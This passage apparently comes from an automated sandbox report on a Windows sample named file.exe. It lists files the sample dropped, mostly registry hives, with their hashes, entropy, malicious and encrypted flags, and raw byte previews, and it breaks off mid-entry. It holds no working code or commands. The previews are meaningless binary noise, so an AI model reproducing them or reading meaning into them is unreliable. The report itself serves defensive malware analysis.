          SSDEEP:192:ItOFNAvY1as2alpXdeEODgRia5cc8iQ6dwmMb5XJmaD3:ItOhZ2UMEOEiQcViB6mM1EQ
          MD5:7B03A3BCBD2B587389152BC8CCA6CD77
          SHA1:D635F75A698755B9F1270D84E2691BB6DF10BE94
          SHA-256:5269530AC731D7ED9DEBE8E81D88F3800BF6DFF06F54304F2F2796151813C51C
          SHA-512:3D81CA1BD802B7471844620B8FFB8F07A01A44EAAA1D4029E3A1B36D2D4C29D70AD217409A09DC9EC7278049B4237AE2C3A9D4AE5590E45A3B2AA8EE34D811A7
          Malicious:false
          Preview:regf.....f......*...Ys.....(.#...<.5.^../wu..F70.m.....Efm>.[x.K.KIMU..:...n....A..>@...dq..J...'K..Q....oP<.J.((......;j...:..U..*<.}n..G.aA.^^.0T"('q.z.6....pO.j...1..O2.z..2.6:.4.....D..@......ig.tU. ...RO......E.k.....F.O.E. ...7n..8.O.E./5(....u...j.U.7r.{4....p.8....r....6..W..{]E.Y..v.@.1..y...qL...Ciu!=.F...GL..|sOj...._...k.b.}......L..G...y...D.}....~b.....(..w...:..y..+1.;A%[.'F.i.....e.\..x&......4.1.l.j..!3.@.....[....s..2......cu....@.y.-D....c....P.=..&w9|..[bqd.6...o.!V........s.-.......K.$.d..-...N...~.d.`...w....P66Y..*.;.|..$^@...N.T'>FP[..wz...|;r......T3ux....i........CU[.~.A.'.S..Qn..._BTQ.0.,mn......k%......"....V..N..G.E.h0.E.....9\z..(..V.N?l..E..(./Y.E70M[....!0b...?."4_{..~.=...a...JJ.O...%Y.Vx.:.C...K.......hW>..YI.A!...j.')..S/H..q$Od.O..$[.p.....Z.[..c.GjS...K...hz..*.B.o!....z#.G&V..8h...o.fR.I...A..]n.. .....Y..kW4.=a...f..!gv..&....m....%...=.[MI..2.L}.e.g.....8v:%.Nv......1.%".....r*.....O....u...D.g.S..@ ....
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.97489158691189
          Encrypted:false
          SSDEEP:192:KK8K7dftgIVtVXCci81h/KvJntCKWwrALIFTxPAONFQZJb37b6z3kz0WgPvp0i:xLgcPTd1h/w33NFEJb37nTM9
          MD5:B4EE4B0F3872EA4203C86C47202FF030
          SHA1:4C10A38438176B889E30108FA86C07AEF29C3650
          SHA-256:BA08DEB64AB3A775B02B9475DF9F8F309C681F9D33405247886EC847FE3DA322
          SHA-512:9E5B1DB196E7E9F1627935FE7FAEE1972B3FAF2762D423D844AAC01E5BD4B272DB2A181FBC7518767A5EAA568C3F388F2232432AF3784794A70F18A46562DBB7
          Malicious:false
          Preview:regf....d.....M.9!w.</..|..0..:.}.,NC:.@bH..4.=R.?.R......O...8..........k..sG....n..0..7Q.>W..j...@z.>......P...F.P.V.TXvts......#.....d.'=l..Q.m.{..5h!<.MF...B....B....=.X.r<.Z........+y*N.....Xj2..D..cdMZ...F...r.l....[.......uZ..7.cL.(......?.....7f.M>..z..fd.....e)bh^.a.c65..b..r.w.Nr..t..X...(6...%..A.K*..Z..-G.P...r..o.H.#...........Z'.1..7$..*.h.S.....2..f.'...`.K..r....)..}..K..=.q/. *n-..r.d..Mg6.n.....8.=.t.;E...*..%.....yx.m...d!....Uu8..{.........3....J].N.....x..{^.}.....$f.&4....-.GE..6.A...{...".DK.h.k...R...]..T,....Np3B..../Tp.<.....<.i...R#..yg...1U...Ufj.x.k....7g,..[..o..]r._YE....@T..mb.D..6*.7...B.S.v.f2....h...s.0.gu...,..X.-.1.yf.>\]c.z..Y..V.H........0.....Y#'!B...}w......6R....N......W.P.....h....=.?.E..].x~..$>...w.n.hp.../..ze.SX..ldOw.<P..2.7~.=.g........6.e....3...<..B..,u@V.....?....*+xHV..#......u..x.Q*S.....E...<:x<03......>..8 ..p..3.\..y.b.....Kb...1..... ..l.....s...z4..yJ.$".C.1.......).y..z.>.[...
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.976082327923634
          Encrypted:false
          SSDEEP:192:fRIt+vOA/0rnfbhTN5S6rmWetV9F/kj/T2:f+t+v3/0PX5S6gbF/kj/T2
          MD5:7CBF1A8C6CCF45617DDF7187F1FE9BDC
          SHA1:3C43B5BA422278DAC5831A3A2F87B6B0FCA27EA5
          SHA-256:95D966CA7CD5197650FA033D21E093E1639616EBAF812DB5DCED429FF5C7584D
          SHA-512:F7A6B9354ABBC8D827A3EBFE8B564230DA357BA62598C51F671361DA0C27105C01C86EF0C72F10EE0E84C63A3AEB634B79780BA977931B3D12C764B1C8090006
          Malicious:false
          Preview:regf..`...}..:........y)..i.~k......~.F....../<..4.k.......p...3/Vr*...n.,,T.dIS.Yi..s>..D...+.t..z.h...2....y.7.<]m+..]4|"%...U.....'k....<..7./.. LAzo..h../.g/{..2^...z..XC.UwD.c....+....'.A......:....W..'pea.]....Olr.45w.Y.5.].L....."9..cX3.jYT.{p..f.../...T.@1.T...$.. ....I.!~.....uy_"......./.J.NJ..b.....@*Xik.........e....}...../u..M.R..2.X1....k..rc.w.9i..X...`3z.<..?..R...W&./...B......,.k/\...Y.{ ..L.....].V..........Rz&..=c.$.nF.4.2.....Z&.u....FH2..[...8r)._>2.Z...WG..*P.RB.....@...;.......>.B..D.~...M..........Hn..o/o._Fy.Q..Q....(YWN.]lJXz...#.nD=..h....W..........q*....h...Mb...g......!...r......B...K\.G]..M*P..J..w...TE Ic.f<.RD.....4.t.....B.u..J}.....~.Ru.....9...o..K....<.(.!N{.._..h......n.S........D......j..M..(.......b.hp.%.\.j.}G..%...A..=..WvH..Q.....Tay..k.M!Rf.y(.^(Mz.)hv~33.P..../"3.7.)..f...g....=..m\..q.O.....A.F0._t.v.."v..@..zV.Q...p..B..z.~.&=.....:....qS..b[^.DG0.M.+...T.^...F.....0|._..N.J^+L..)[=K.6.
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.976752723915352
          Encrypted:false
          SSDEEP:192:bfyPU9ryLuaMwMDn9X1/TmwqKjHUwE0ZogZaPDn5f9aL:W86uaMZb9X17LoNSoNrh9O
          MD5:957FED41EFBCDA8E42E5254D07372BB4
          SHA1:05A9EC7D69F1B5F1C90D9B034DBDF7CD9271A1FF
          SHA-256:18312B04D5ED2C69C5B6BDA6CBC484EE6E2060E3E0EFC2DC99E7C5E962EDDA9F
          SHA-512:3A85F5187C445F9668B19D1D902FF02142D839560C023FA1D9BF40740DC498CA54441C9E8E6B14E2A587AAD9B79FE21A962D41318E8BC7F8E214D17295E452D7
          Malicious:false
          Preview:regf..........T....^.E.59{t..Mh...oh..;=.E.}.YQH}.x}.....>.....b.Z..&.Z^E.GS%..\.U.@.@,t.D..&..4.A5.p...j9.Z..X3.=.KG[I.u%.1P.8|........Pz@..l.,d f...y.X.9.'v.?k....b.B..Em..v..o..4.Y.....!T.,.AJ..U.r.......*.D..\0.=i...[..`....;....E7..%.!2z..o.......|.>.nF`[i*..s.J!~..l`9*.../..u...XQ..+x.y...5.....s.mT.\9...2.......T...."B.2..w..J!.....UN....)^Z..q4}8......;.3....@AL...Y.m..r..z..W...1:..L.#.'..1...e..b.Ks.R."..gr.97...Xi.&.Z....|........+Pk.X.Y....-......O,........q.f.N.e.w.uV\.'?....n..'.f.....W.nd.}V.i..........X..q.....2LW."...z.C.p.P..3....S...V.z.x.Q..#._i..p.CYH.L-D\.:3....O..Q.-...D{.....n.P.a.6...Jp...25'.HQ..L.;..$.v.3.....@...;6h.u*....xE...X..}...m.E.2qqx...}@7.c.{-.O9...D..X2....$...._f~&....m._.O;..e.....+`]|<.$kv..~...cTf8....!.l...5..5.!.$;e...>.-..Y....#;B.. ...S...K....]...S.9..,.X...t&..X.Z..&."k.^....V.x..[8K..3.A.<..l...T.%..b....LkR.|....DM.c<.bJ5.1.^..W5j4.=.S~.k.W.;....6..xCY.C..=..UL-..K~C^.;.... .X....&O;./.x...am....
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.979890559495724
          Encrypted:false
          SSDEEP:192:hzwPUBqF5nn3ku1ZPMDRUhz1ML8PrGx2PN8nzzPzyXTZpMOwhy:hzwPUBkn3kufjxGANSyXPXyy
          MD5:C5F4441B106F310CDCC103E6DE8A8CA7
          SHA1:8531416D9BFA7549A299F782519AE8DAB973BB9E
          SHA-256:1E32C1DBB60155B38E7D546E0530C81386F7EEE1D9D461AAB8256F5C42B64E9F
          SHA-512:D9126F5DE5CF98B5FA4CCA5AD2139D6E29D9B14FEC1C85CD6561D05C7F0D720C4E006BDF8FADF9FBB1044563527A24BE6661C4BF2464289F71D3F02EF2DE9038
          Malicious:false
          Preview:regf.?..!.K }...gW......+...~(_.<...c..x....V.v.t.E.@.@...`...p...GK....?..Z..........6:..... W~.8....#..A'f..U..o......u.G8..UJ....2Ul.EXs_..|H..?f*B.s....ia.=..G......|.._....o<...%....qP...R{Y...S..<.>..eL......&..L&.t...tL ....;..Pd.Y.(:.`Q.....a..=...~pT3t.jAJ^1.....}.M.6y..s1R/./%..K[.4..d.I...B..p.\._.7.....ncF^.=..;=..-M.a..Boc_..M.S........:....{..!......Mb.)...,..-..Sc@.....r....~?.%...~..Uo......P..o....7v..P...'...D.G.Sl............O.....:..%.RD..P..t..x6...:9g.~4xn`..z.....O.....n#(.X>(...JY..2#....-....A....@A."!....b........89...9..h.'..@.+.t..B........D.7.f:.....u..c../.. sUF.hQ.a.S.do%..ua..oG........@.bR.....G;...T.g.y...%.x}...<pw.e.B<.l.S........hU.....c..wj..3 C..u.N.K..Iaj......>Gw....Ib........X..i5.{...tp......&(..S.~..w.8......2{.yv....j.'/Nd.;.[T.}..=.^6.!.L&.....n....A.g. .....P.Fdc..l.=H$......"<\../<.A..L.A.v.. ..I;eRnN.)...7A....K.We.}rQ.h#,.{.9(..B0*.ho...-....b5o.|.z....;z!}|......*.....`..v.+f..F..2....nw...$N...
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.977201833590514
          Encrypted:false
          SSDEEP:192:512ltrXwrYjGH5akXEE99q+ARy3qvqzZn4RlCJcB/3ypb:512PrEvlt3qCzZn43NE
          MD5:8BA436524A25CD0EC6108B4A910D08BE
          SHA1:C50C0AB8E15273E412666CCCD435FB047CA08139
          SHA-256:10F47088B72E3B664209973FC9DF62CB3A7F1F4CFB847CD810053525B7936203
          SHA-512:1BF56375D220A37787F4B29C88D983135F29D0A98FF3B12076B6739897776CD155830D17C8AAA2D05C78C7C488CAA6CC64527DCF35775CC0BC70C425DAB26D18
          Malicious:false
          Preview:regf......K.uU.1W.).@9...*.a..3.]P.q....u..#S\.G..F..d..W..@.8{..5.. .....A...2..b.A7....\..uKK.?l.Z..h.@.XN.F.U...0.%NQ:...$....z.2.."..*.......tJ..UN.5]..|6..zf.{....y....z&.BR.a,efS.n...5.R..(i......p..[.v..E?.....8........N8N.+..C..`..U.....:^Q<J..t..Z...et.V...B...FZ.9p8..&Q...h.._*..5..2..p.'+...z.j.._.d......u]%} ..r..%.0Cq.OG....\2....F....A2.{._Q{,.F...d|.2..88F....d..GX.]..T.*J.....]..G`.&........@%..Is...@~......~.G.c.#.t"....0......`....@..=...4.6NO...-..VH.$1......}...|..........&. ...D.Qa.d...`.,..eHI:.YV...uk...u.V&..e...k...Ym..z2...VC.i`..N.......L...\.IT.i..g.....+.'.a9.GsP-.w.......>..siW........+.-...rpf&e.....~.?..S/@k..%.{7W...ch.^.m.....xA#M`K.H....&.]..#.1....;..........w..`..B(,.J..Ul7X..>3.Gi...>v.'Q...=W......./v...i..,...:...!.=...9cD....#...6}#..]Zl.....V..t...7..7.t.......!..H....J'r..g.V9.1...,.`T)..pO.^....j.z.6D-.m...J....V..m1.Y.or.qQ..A1../.6?.Vf.....n.k...'....>g....G.M...|..[o.P....M.0.#.b..q.c]
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):49454
          Entropy (8bit):7.996431534717508
          Encrypted:true
          SSDEEP:768:fNdlEDPCEb/XpP/azwX2533tVOv6HFOM8AHsJXHF7bAFQPPygQMvcbFTsGa7:fNdeDtzpnXMb5DLM17b7AMkbts5
          MD5:EAE9C7B1DE99A8C4BAE8DE9C60B3A5C2
          SHA1:214C6F7AE82390EB9EDF98C6F4D2F74817279A23
          SHA-256:C4AAEC19A7615356E6AF6E610D1D1EB3F4A41A52FB1918BA49F9ADBD96A35B29
          SHA-512:FEFB401E5F65013D9B4E7394DEFBE29FB90EC597C81D83A5928EF2DA74D45D2CD52C337C1D0EF3C12E811BA4E877D4D883EBC59011D98BA2D122388D272AE7F8
          Malicious:true
          Preview:.....#A..J.... ..g..^.x"...W.......J4w.s*U..@.d..\F.W..&5p.J..7.........,=-./.JC.....B]#S#H..--.T..HRR..K...........m%d....s..#R...........o...0..)A...,3..6..K.b3.........Jfe!.X.I0V$k`h...6...Dlj..:....p..E.|.C..^..R..Y..E...`.T\xv...7..p<k.1.s..d....h0e.Q...Z.*..g.5+.F.`,.e....lS...YD.:.o..%.v.@.\q..B.....?|.v...&.e.........]C...019.$.*..7.F%..0.b......Q.h.....?....g9.^.qqEC.O.M.;.....Y..4j..*Mb..H.~..Q.M.....z.E..V.Q...q....9P57.... .,.....t...EJB.t<.h .....~=.P.J8...`cP....?.v...A.....r.L...\...u.aI..,.$.G...pP.....r.[*P.]....i.g....CI.iY.8Yk....[y.y.w.Gm...LNN.#I<....p.(..0..X...Y}?X.U^....&C3Pq....*.o......u..U.5.(..#........amW.B......L.B([:5.xc...4..6'..o..a~.i@....E.Ha...w,....cQB..wq.. ...isTV.lW.......{.u.j.=...9....C....xb(.T..B..l.=...J1M.>}.....`D..&......bbH....(...dj.^f...?voW..d.......7G.>...:h|.....$.J....Tu..7.k.f...z..i%.}s.e.,..(.#......4....cI4.....m8.=H....<W..X.....q3.....F.<WB.hu.Op..v....%..BB@..t(.oe.A`.n...._....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):347
          Entropy (8bit):7.237533821203146
          Encrypted:false
          SSDEEP:6:lzUqz77fCsOx8oZtasYY04tHipK7N9IhNkTKVszVMn0Uj8iSjGxssZacii96Z:1tz/fCvtNmkHiQSuTKSo0UoHixpZaciD
          MD5:A1860E174E5AC2282090076D4BAEC843
          SHA1:920D576A72D89F34DE37C835ACFC5F09F67F1E2C
          SHA-256:02E4E115D38D4EF0579371BBA29227EB7D7AC31E61087EDEF28FD7794296DA5F
          SHA-512:4DD3C6A6B1E4952597504D03C2D72DEFB93FB23207032801A9383A8025517CD4ADE5CC9F19EA8B3339FA0CF13D87528CA4B4E5066646393A6876D44186EF3B4F
          Malicious:false
          Preview:<root.U..+... .r.]l...C.&.a..l.H.=.\.....'.d.....w......-..%..@.#GDh=..~g................~.o'.UGA....;,N.|.V.Cvo.Y.E...h.?.|.......l..x-.c.w....x=5.jy.....}..I/.Vr.*._..7uck.1..v..).......Py....-(./(..'.8..4^.0....G0q...=.4...69.c?..,....C...b..P....;...~.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1573198
          Entropy (8bit):1.386166222309737
          Encrypted:false
          SSDEEP:6144:fPSQDVX8eTTCA67qmPgWM2mhXFzc74xxiA:fPLF897NPgWM5hGo
          MD5:E79D5C921E310DCB91234DDDA4D024DE
          SHA1:4E0DD2ECA35BECD15D2CD92A8789B15779C58165
          SHA-256:3B2E9BAC9AD52C96BFDA30A672DF9BE935DAD787D7678F0C881D6DC5B61C91A8
          SHA-512:E594B53D4C3E3856934282DCB20591958D0E15E561611B7CC46AFF06B44CE10CABE5CE9A33C95A764B632F00784DA839FA5C5F743B7F457D73DC61873D3AC59C
          Malicious:false
          Preview:wvi{.C....e...r.........`$.#..U.7J%o..f.aa.)%..W..:...W...#....._'...?.C...`..h.u......*p.A.=)oZ"..}xS'hC....Vy>...f.CIt..m...k.q.|Gp...69.....w. ..1I+M.B.....p....6.0P!..O.\.U*.j....$.g.Z..GM.}.(.$........:.d..b...z...../..N.q._...=...F........Nk9.\...2....Uf.*.rN$.......{..>,~..........y8;sXG....W..Z...9.l.<./.f......IhQ`....&%iUpi..|.U.6..+.......*.........YT`.x..._HT^Z.@.w,..8...rJ.<......x.L<.Q..e.$.b......D...M.I...gu.|..f...e....O.}...9.1.s'..?.{>.b....._O..xt.4.%..1%.zz...9.st...(...H..)1.?..4..'..K?....T&8yPp...\m..q..nH..4.._8.H.....v.G._)...Ck....?o...n.....0..p..<F.N......E.y.....8...^...s.`..fa$....7[1....W.}.... .pD...v..-...Ep..u..Y.../[...I;.GD.d)h..-.Y.=$U..T,W=.................ed:.iO.C.)...Bup..H>...@..l..p0h{]\.j.S:L.>.......h)J...Y...Jg.d.."........-h...5(bk@a.U..d..3..b.P!nEL.......Y.>c.O.g.f:....(.Q.p.J....<.m.s,.w*w.No....l:4T....[d.i.R....;.&A..T....=4...I...;K;A|5.!X..N.%.u|.z.UK.v.S...d.I/ihv. C.eJ}e9.4;...(.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):16718
          Entropy (8bit):7.988974331536573
          Encrypted:false
          SSDEEP:384:9HB6aPqhy4cgntTLQ8Iiy5YymDfWEfBP1+cTOj+FXgTmV5LAp:9Am+tTLQ2uvmz12FwgTmIp
          MD5:CD89EA7D7559005EB3423842A32C9CE4
          SHA1:3BFCE29447129764B78B7F788D204988A754A90A
          SHA-256:9C186D0B06E8C586DD73D58CE807DF0EC8ABA0DE645D9256F3B7108C872920AC
          SHA-512:EF96EFB2F4D4DAE8971B613CFA86E24C7520FBFAE6159988719C62AEC56C45A05437BE915BCC36CD767C6AB546430E8944B81ABC6D792F113CC31F9603BB3707
          Malicious:false
          Preview:.zG3..`....0k...l.......g..=.M.pD..K+.E....sr.D......X........n...tP.........!m......C....Xs..N^K(.A0.#.S\F...^x[2..._.......sE.s..*6.9Z..!..}..x...~k...\:?.tN..$...4..d...YaWzH.a4..8..^...J....[).l@.y.2%.....\.Ft"..MN..d.C...<o_.....x...s.j.YF.......6..=K....v"9..*p...Y...Q.Z.<LSa\.A....9.R(x.{.G.0...r...G.<B?.a..>.D...~Jc.8KK...K..D.q).......K..8d..e...u.{.\...NNB.5..4`..~w~t...l.1.et-..w.7.|..n0..f..yN4...]g......]...1....."..4U....v.....<o..Z`.{=*8.g.n......3.c........x......0.L...#h...8..)r6.Z..q....^.H..........[\k.....D....k...`...W...47.v....{l.|c..Z..y.7.N8.:<...e.\..x..e.f ...W.'.6.....Z...+.L.lc..<.1.Q..#C....D^La.\.&....t.C....,G..?....kP...o....._.. MW;..&Q...}.}....}.g..C5Y.t...b...z...C_ ...*...7....r7...W9..8.d..#..y.....Q........v.k....l.h&.a....<We.5.J|...6.c..j.6w.lH..>....4.....<.H,e....B3=..!..D.-..{tf..|....<...+/....n0../V.y.p.\....b..W..F......"q.L....3@...=.n..M..Q.A..iA.!f..G.$.c+.J]C.............J...7*r.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):107523
          Entropy (8bit):7.997945989443442
          Encrypted:true
          SSDEEP:3072:k9RsUzHk/WTg+cZk/Y3NEYImsU0hBn/q936C:csUzzg+1/SNXIhBnigC
          MD5:1F792197AEC16E9F8E1F0DB38A1D618A
          SHA1:32AD7B87046314E823763807F2200DB979610A1C
          SHA-256:366DB62D6C2910DFF4AB07B79FE7017A75DD1CFF180943F8B832FF3E2FEBE53F
          SHA-512:BA9F0ED9D80318E9E3394D0E1A1C6DFE57B436A8B3F72767E60337FA22B2C63DFE1D4AAB0463896EE18035A3E6ACEA6561B9CB09BFDBABF1AED2F967D2D8646C
          Malicious:true
          Preview:<!docI.....Ek_Z.m...t....4....}..s......P.T.C.f...zo.f..k..A.C`=..-..Z...Q....CD..:.y...p._..ZG.....x.:.0S.?....lz]..V8n^?Ng.(L..*...l.i.T..?..S..X}P.W.X....Q.;*...Ny\"....I...p.aj\g^..D.....x4..{.3....nx..xv......#y....{......./{.s.\V.M..qa..4`>.^I.^..G4.M..>.UL...0*.......O7..W..U!.W....K.......<}s.@A....b.L.a.#..c..*.....9...m.P.M./.[;b.<......$..=.C..q".7..(VNx.....H\r.s....1A...Fb.....G.zJ..O3..[P.J.(.,.S.Cy...4../c...Js....tyw-a..1..k......&B2.Y. . .!J...0.Tz)|...H}P....B.q.I]..TJPM....7.<....d.....G...U...Q.'..)|...o.>...5..>E..N..{.j'...&....-...B+x.-.........*3$u..@..0.f.....}m.I..ZI.u.42<..:.t..c.{.X..{./%...*.A? y..w.O...`.&.v1.\...7t.@..<.O......-.......>U.4....v...Rst..,3. "H...nN.......Y.V.)g.?.V..o[...{........;.dQy...xqah.........O..U.io.u.6.D.......c..K......`.....}.E...v..R.m.'.S.'..'._...E.~.....N!.+.]).9.`..(d.G...+.4.....f...P.^...K|Qo....C:..=`.....E...l..T....&.qz.5....G2#%..f$.......ktX..K@m.lx.&1.
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.980367436239423
          Encrypted:false
          SSDEEP:192:LG3pAIdVXcUh0fNlDXXhqzcqUP/opjkpnk/sZJyVYSxGJMvJre32M3N9+sz8jYTf:LhIddcrJXXxohkcsZJyzUMBre3n9+sAG
          MD5:45C9DB5D4F700725B42DB62605AE0288
          SHA1:390274D024F9ADA91376B7AC24E48281F06D910B
          SHA-256:3404F0C478AA017345265AD752012A6FBBFA72DD97D57E1928F884040A26F59D
          SHA-512:BAA0E350096105522F0C3013571C54695B282E20EAB7E2429A273433DFEAAD9C92436A7E93FA0B1D6591B9399F44018708869329AC87045E8531BF1FD38BFE35
          Malicious:false
          Preview:regf.S]...e.fBQ.........0.r...ZF./>SNr......U]...!...;.........y.5.).^X......1.pE..I#:..."...X\.P..,..}{Hq..u....G?..p.Z...Q...WA.K...k.....@.<H.........(.5...2.<.wj..S[5.mK...zb...<.P.7..?.%../....3...mfw..]Z3'....U..a$.b..5"...#..-.Q._'>......k{.B.)t..B;"..H.7-.ym..-..3.b....TM.('..5.+He.uG..&..P*..4.?}K...F..mn.%..y.....s...s.y5.SR%0.`y...u$q.f....L....(.+..?.F.t.Cg.v.P.gL..O..y.P.....U<..k..u.....@.HS;..t.B.2os..v.F..YC.2..;S.%.6...I.?..M.D...F..._M.6..Gc=....Jj.(c.-..w5~.Z....-.T.0...{."]...&h......s...i....>..E0.k...g..<...qw,aZ.#b"..d.].|.M.J..../h.6.W_'.}f..w...j.....&t5 $..W*......Im.4..._.....{#.O. [.. O.xf..}.*7........g.P{m.0....._.x7....Z...,TOK..AQq".V?......y....D...w.$.M.&..2Y..u..U..R.b|.....R....B..=....v.0b.....R....H.?hg........QG...SLS.7.K....iEUU.j...k.o.J4...#.]5.=O&_.A.....S.Y.me...(.....w..{.........Y._}..a?52....hV1..c*eRT...GgWi.t....,.s1..J.....D.b...F;.BR...S....."..|v...........hm..\.}..;.3.N]y.K,Nr%..4.w..q.*
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.978378234936866
          Encrypted:false
          SSDEEP:192:07VVmaUcMjruQDl89f5xpe08AyqKNDchkteTn9LoNLLuXP5qokknuE9NA:07CTtjNDGn6gSQhkt8KLa/5q9OI
          MD5:54E6734A3ECB7206BA3A9064C42D06FE
          SHA1:CFFE1A0D7E2ECBD55A34529A9B584613D97AB8A9
          SHA-256:CA18DB7688DD279B751BADD223A34A67BE7A0A990242D1AF68E25785D9948E4B
          SHA-512:281D81BFBC2FD4DABAAF1679027D98E7675D461212259961DA3063CA3ECE713F55BD0F08701D8F7D43D905B8D84F9C2B44B50C30A5B97FB550E38D2F799D6088
          Malicious:false
          Preview:regf.@.\~.s.2-...M....!..;#..f..z.....|K...*...$.$......?.....F...k....(.y...c.~U.P.(...z?T.Z..6.,..*=.M.Z4.5....-..T...i.w$r...C...GWe>..&..yd9.dg.5r.O..q..>.D}.3.X#..%...........C.. ....gX.....^..VU$..c*...Yf5..t!.....Ib.>:....3Y>.k..DLj..6...-.{H..Rh..y..C...aG.m..|.<%...]...j.._..X...!7g9i].2w.e.. ....D.d.....:.<r~:qG6 .b..V.9......%..s.3>HB...n.]'.....(.Z....?.F(>.S.~....2.GC..u..&`.#.._~.......Q.wU....i...mX...-.j>V.w..x.....e..%...AY.. .`..B......U....M..R...R..I./..1.N..1...nMIj...]_<....-....%.v..j...O...1.....k..$...B...r.*.u...d.J....=y.eJ..kO......y....J..L...s...59=..6........O.p&...O(.p,.....mr.L..?.@H.T.C.>#7.[..rw..F..2.$.0..i.|K..J%.L|7b.ls...RU.....G.J..2A._Q.l4......n.......wW.&.SU...p4.b. 9.".z.K.....>M..L(:.....li.n.0..j......v..Cq...D?/2&.}........kdkkd>..;....Yp.)V.E......x...=..'......Yk..2.#..../~............<...L..Q.@......<....`>P}..R....ox..0..~.Fk.$....~I~.#.^.......1..".a.%so(t#.......p|.G...-7..p.
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.981876440472717
          Encrypted:false
          SSDEEP:192:1hrM+I44GO/R4WmYh+T57vlQQXlvIMCHgNMZyE3sSRnUJXr3m:fMrGOeWCd7vyQBIMZMEBSRnUQ
          MD5:DF8A004C0EB172DDB335AF490746F240
          SHA1:7059A3E3F8D8DCABED74CC6B180405FF7F7012F0
          SHA-256:13682B55EE446E4692803F9FE0AB0F38712D9B6B95644E7520964D6F25B1E6F4
          SHA-512:CFF46FABD7EBB785A6ACD6ECF8FCDCBD053A0C710FFE0C09D45C5D52DA006984BF3616A332AE621D729457F3A381280932D7435B98F1181C034B97D07FEC77D6
          Malicious:false
          Preview:regf...)n..Z......(.}..dI.I..A.......F..vv@.Pos.\...vs(....j........)L]. 8..S..h..XF.,.&(.^....:f..|-Z.Vl.L.!...6dB.4.....[j.jN...![........w.. W.j7...YD......D...v.....y....7....L..b.u8....i=~.zV.\.".d0HM...i.p.h\.W.%..o^t.n.....2.?+2w.F`_+.8.6Ce...$}....$...;..).U+*+.j..c$..;..8.....z.d..J..e..D.......y}..h.......i.G_.......a.>....3&..<.........R.}..V"...x..sd.,h.. D...:.....>M{.6.p<.n...}{j$K....v....*...'....q..{/Q;..d.c..W..q.. 2.-... .!...%=.`F.;'\....y-.;.RA_..<.O.9.".....HJ.9...>q\..>)...^..9.I.3....x5...\.wts.;.$)..&?.@.......*.|..>.&j%y...."X&Y.y.u.i!e.m*.D.v..!.|.5Y...t.>f.sH..w.L.u-..`m..w.z)p.y*..i...$.....1..|&..D./I._...B.8.mL.tB).o..Sw.........qR..E.~.~.....k.3..!.D..d`...+.\.!!...p...o!...%g..4.+.....f.n{O.0.?..!..".4.u.."a[.......$.^...J...I..C..QrT......3[_..>S,.u1.WK....-.P..4J...3.....q..5...3c.I.u...G]..F7r...>,M.....Pm9Z.~...Y......._...aV...l...#w..u....{.....G.P.f......1...$..NCw).dm.!..`.K.(7.cm.......3
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.980299786705873
          Encrypted:false
          SSDEEP:192:yrCvgt+DRtCEGPiFFr0Pn/NzJVkJQfwA/LZ1ff:DgtERtCJo0vlzJVS4nLZh
          MD5:AAD5E4132EFE770F418F87028079146B
          SHA1:48615ED72AEF51FFCF35FE35D21B8D261369CC19
          SHA-256:E6120CE5A5EF363D3DC87EA4CE6BBF65FC55595C6F06A852D6FE615E965C5FAA
          SHA-512:A90189A7E3F296CD0A81CF2E013DD7AD4F101456D7B88FC5019BB180F3E0DD4BB42D82D9592FB3D2A1EC9AC71BE5A8A3A92F9822A30F2BE75E1C086CC10F8154
          Malicious:false
          Preview:regf.S{......k.!...}...(.p2..L....j.Y.T,S.k...Vn..-.3....... ..].mdd......."{%3..bi...l..}9.y....&..&...G...G.Q3.2({...c.P.k.q....g...*..S.p...=...Yfeo......uz.H......O.D=:x....%?.:....|.%A.%=7-~=...`...=N..r...}p.f.j...T..2.......W..iO...}....R.}.\.|....%......vn<.. O..#A.1h..S..s..]%).=..1.%...?S...&k.?...9Z.4..D...2.?T.A..V.@.pM..a.".F.f.nF.G!-......./{..\....;...lY.oR[9(...,.Z...y...V4....:sOF..........C..s......t..w.......53.1=.R.}y....[6..U....(...=.{>@.....A.E.f...NE4cVjD.2.#[..mS.......uu.z...M..x....8V.._.K..kr./.&....0{mH/M.Az.S6e.b..-...w..s..A.....x....AW.D(.M......`.L..lL.V\..S..C....@..."....+0.T............I.O...........7Ja'..b.....$.....+.._jN=p....K.d.g...f....._2.=.....D=.. ...`E....l..U....2#!7}.I..%..X ._..Oi.H..'#.[...D"...HQ?C.$.A".,.....M......4k}.{[8.Y...A8M.K...<...`..e.'..~n"P...M\.j.......K$....&........c...Y....=..5........w.nN..CC.T......./i.?"Q.....O.B...I.@R....y.`S.GH...&.h.u.Q..m....*...Y.....ul`G..k..%..
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
